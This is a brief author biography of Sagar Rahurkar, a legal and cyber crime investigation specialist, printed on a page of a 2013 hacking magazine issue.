Sagar Rahurkar Sagar Rahurkar is Masters of Law, a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in Cyber Laws, Fraud examination, and Intellectual Property Law related issues. He has co-authored a book titled ―Introduction to Cyber Crimes and Cyber Law‖.


Issue36 – Jan2013 | Page - 27

CHMAG-Jan2013  

Hacking Magazine: Issue 36 – Jan2013

Read more
Read more
Similar to
Popular now
Just for you